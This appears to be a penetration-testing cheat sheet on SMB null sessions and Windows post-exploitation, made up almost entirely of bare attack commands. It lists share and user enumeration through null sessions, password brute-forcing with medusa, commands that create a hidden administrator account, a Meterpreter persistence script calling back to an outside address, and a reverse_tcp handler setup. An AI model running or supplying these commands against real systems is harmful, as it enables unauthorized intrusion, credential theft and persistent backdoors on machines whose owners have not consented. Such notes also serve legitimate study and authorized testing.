SMB and null sessions
nbtstat -A ip net view ip
linux nmblookup -A ip smbclient -L //192.168.1.1 -N
Smbclient can also display administrative shares that are hidden when using standard windows tools
Null sessions are a piece of history of Windows hacking.
Check for Null session attack:
verify, exploit the IPC$ administrative share (try to connect without valid creds)
net use \target ip\IPC$ '' /u:''
smbclient //ip/IPC$ -N
enum -S ip (enum shares) enum -U ip (enum users) enum -P ip (check pass policy)
enum4linux
Check pass policy before running auth attack lets you fine-tune an attack tool to: prevent account lockouts prevent FPs choose a dictionary or adjust bruteforcer config
net user admin pass /add net localgroup administrators admin /add
xfreerdp /u:"admin" /v:10.2.29.226:3389
run persistence -U -i 5 -p 443 -r 10.10.11.3
background use exploit/windows/local/persistence_service show options
set SESSION 1 exploit
exploit/multi/handler
background sessions -K
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.10.15.2 set LPORT 4444 exploit
/root/Desktop/wordlists/100-common-passwords.txt
smbmap -u guest -d EVILCORP -H 192.166.155.3
medusa -M smbnt -h 192.166.155.3 -u william -P /root/Desktop/wordlists/100-common-passwords.txt
enumerate Shares (to find hidden shares)
enum4linux -s ~/Desktop/wordlists/100-common-passwords.txt demo.host.local
Last updated
Was this helpful?